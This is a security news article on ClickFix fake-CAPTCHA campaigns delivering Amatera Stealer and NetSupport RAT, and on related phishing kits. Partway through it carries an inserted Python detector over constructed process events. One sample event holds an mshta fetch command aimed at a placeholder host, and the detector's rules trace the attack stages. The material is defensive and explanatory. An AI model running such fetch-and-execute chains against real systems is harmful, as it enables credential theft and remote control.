- Malware operations are using the ClickFix social engineering method to spread Amatera Stealer and NetSupport RAT.
- Amatera is an updated version of ACR Stealer available via subscription, offering extensive data theft with advanced evasion tactics.
- The attack chain uses a fake CAPTCHA check that tricks the victim into running a Windows Run command, which launches a PowerShell script and loads the malware.
- NetSupport RAT deployment depends on identifying valuable data or domain membership on the victim’s device.
- Multiple phishing campaigns use varied malware delivery methods, including fake invoices, manipulated websites, and obfuscated phishing kits.
Cybersecurity experts identified ongoing malware campaigns exploiting the ClickFix social engineering technique to distribute two key threats: Amatera Stealer and NetSupport RAT. This activity, observed in November 2025, is monitored by eSentire under the label EVALUSION.
Amatera, first seen in June 2025, is a development of the ACR (“AcridRain”) Stealer malware, whose sales ceased in July 2024. It is now sold via subscription, ranging from approximately $199 per month to $1,499 annually. According to eSentire, Amatera enables threat actors to extract sensitive information from crypto wallets, browsers, messaging apps, FTP clients, and email services. It employs advanced evasion strategies, including WoW64 SysCalls, to bypass common sandbox, antivirus, and endpoint detection systems.
The ClickFix method deceives victims into running harmful commands through the Windows Run dialog as part of a bogus CAPTCHA on a phishing page. This triggers a multi-step process in which “mshta.exe” executes a PowerShell script that downloads a .NET Dynamic Link Library (DLL) from the MediaFire file-hosting service. This DLL, the Amatera Stealer payload, is obfuscated with PureCrypter, a C#-based tool also marketed as malware-as-a-service by an actor named PureCoder. Once injected into the “MSBuild.exe” process, the stealer collects data and contacts a remote server, which may issue a PowerShell command to install NetSupport RAT.
eSentire noted that the PowerShell script checks if the target computer belongs to a domain or hosts potentially valuable files, such as cryptocurrency wallets. If neither condition is met, NetSupport RAT is not downloaded.
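A defender-side illustration of the chain described above, added here as an example that is not from the article or from eSentire: a toy detector run over constructed Sysmon-style events that flags each stage (a Run-dialog launch of mshta.exe with a URL, mshta.exe spawning PowerShell, PowerShell starting MSBuild.exe with no project file, and MSBuild.exe making a network connection). The event field names, the explorer.exe parent for Run-dialog launches, and all sample paths and addresses are assumptions.

```python
import ntpath

# Constructed sample telemetry modelled on Sysmon EventID 1 (process create)
# and EventID 3 (network connection); not real logs.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 500, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmd": "explorer.exe"},
    # Victim pastes the bogus CAPTCHA "verification" command into Win+R.
    {"id": 1, "pid": 620, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "mshta https://verify.example.invalid/check"},
    {"id": 1, "pid": 640, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe", "cmd": "powershell.exe <stage-2 script>"},
    {"id": 1, "pid": 660, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "MSBuild.exe"},
    {"id": 3, "pid": 660, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "dest": "203.0.113.10", "dport": 443},
    # Benign build: MSBuild launched by Visual Studio with a project file.
    {"id": 1, "pid": 900, "image": r"C:\Program Files\Microsoft Visual Studio\MSBuild\Current\Bin\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "cmd": "MSBuild.exe app.csproj"},
]

PROJECT_EXTS = (".csproj", ".vbproj", ".proj", ".sln")

def base(path):
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()

def detect(events):
    """Return (rule, pid) pairs, one per event that matches a stage of the chain."""
    findings = []
    for ev in events:
        img = base(ev["image"])
        if ev["id"] == 1:
            par, cmd = base(ev["parent"]), ev["cmd"].lower()
            # Stage 1: a Run-dialog launch lands under explorer.exe; an HTTP URL
            # handed to mshta.exe is the ClickFix hallmark.
            if img == "mshta.exe" and par == "explorer.exe" and "http" in cmd:
                findings.append(("clickfix_mshta_from_run", ev["pid"]))
            # Stage 2: mshta.exe has no legitimate reason to spawn PowerShell.
            if img in ("powershell.exe", "pwsh.exe") and par == "mshta.exe":
                findings.append(("mshta_spawns_powershell", ev["pid"]))
            # Stage 3: MSBuild.exe started by PowerShell without a project file
            # is the injection host the article names for Amatera.
            if img == "msbuild.exe" and par in ("powershell.exe", "pwsh.exe") \
                    and not cmd.endswith(PROJECT_EXTS):
                findings.append(("msbuild_injection_host", ev["pid"]))
        elif ev["id"] == 3 and img == "msbuild.exe":
            # Stage 4: the injected stealer beacons to its server from MSBuild.exe.
            findings.append(("msbuild_network", ev["pid"]))
    return findings
```

Correlating the pid of stage 3 with stage 4 (660 here) is what turns four weak signals into one high-confidence alert; the benign devenv.exe-launched build produces no finding.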
This pattern aligns with several other phishing efforts distributing various malware types. These include emails carrying Visual Basic Script attachments that pose as invoices to deliver XWorm through PowerShell loaders; compromised websites with malicious JavaScript redirecting visitors to fake ClickFix pages mimicking Cloudflare Turnstile CAPTCHA, installing NetSupport RAT as part of the SmartApeSG campaign; and counterfeit Booking.com sites deploying fake CAPTCHA prompts to execute malicious PowerShell commands launching credential stealers via the Windows Run dialog.
Further tactics involve spoofed emails simulating internal “email delivery” alerts to steal login credentials and phishing kits named Cephas and Tycoon 2FA directing users to malicious login pages. Barracuda’s analysis highlighted Cephas’s unique obfuscation method, which inserts random invisible characters into its code to evade anti-phishing detectors and disrupt signature-based detection systems, as detailed in their recent report.